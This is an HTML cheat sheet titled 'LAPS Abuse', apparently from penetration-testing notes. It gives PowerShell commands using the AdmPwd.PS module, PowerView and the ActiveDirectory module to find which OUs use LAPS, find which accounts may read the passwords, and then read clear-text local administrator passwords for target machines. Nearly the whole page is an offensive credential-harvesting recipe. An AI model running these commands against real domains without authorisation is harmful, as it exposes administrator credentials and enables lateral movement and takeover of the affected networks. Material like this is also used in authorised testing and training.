<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>LAPS Abuse</title>
</head><body><b><u><span style="font-size: 13pt">Enumerate on which OUs LAPS is in use and which users are allowed to read passwords:</span></u></b><br/>
https://github.com/GreyCorbel/admpwd/tree/master/Main<br/>
https://github.com/ztrhgf/LAPS/tree/master/AdmPwd.PS<br/>
<br/>
<br/>
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 <br/>
<br/>
Find-AdmPwdExtendedRights -Identity OUDistinguishedName &nbsp;****This has issues, use the command below if getting error messages<br/>
<br/>
Find-AdmPwdExtendedRights -Identity *<br/>
<br/>
<span style="font-size: 13pt"><u><b>Enumerate on which OUs LAPS is in use and which users are allowed to read passwords using Powerview<br/>
<br/>
</b></u></span><span style="font-size: 10pt">Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs | Where-Object { ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty') } | ForEach-Object { $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID; $_ }</span><br/>
<br/>
<br/>
<b><u><span style="font-size: 13pt">Use the following to read clear text LAPS Passwords via <i><span style="color: #ff0000">PowerView</span></i>&nbsp;(Keep in mind you have to be in the context of someone with the privileges to read the LAPS passwords, gleaned from the commands above)</span></u></b><br/>
<br/>
Get-ADObject -SamAccountName &lt;targetmachine$&gt; | select ExpandProperty ms-mcs-admpwd <br/>
<br/>
<br/>
<b><u><span style="font-size: 13pt">Use the following to read clear text LAPS Passwords via <span style="color: #ff0000"><i>ActiveDirectory</i></span>&nbsp;Module (Keep in mind you have to be in the context of someone with the privileges to read the LAPS passwords, gleaned from the commands above)</span></u></b><br/>
<br/>
Get-ADComputer -Identity &lt;targetmachine&gt; -Properties msmcs-admpwd | select -ExpandProperty ms-mcs-admpwd<br/>
<br/>
<b><u><span style="font-size: 13pt">Use the following to read clear text LAPS Passwords via <i><span style="color: #ff0000">LAPS</span></i>&nbsp;Module (Keep in mind you have to be in the context of someone with the privileges to read the LAPS passwords, gleaned from the commands above)</span></u></b><br/>
<br/>
Get-AdmPwdPassword -ComputerName &lt;targetmachine&gt;</body></html>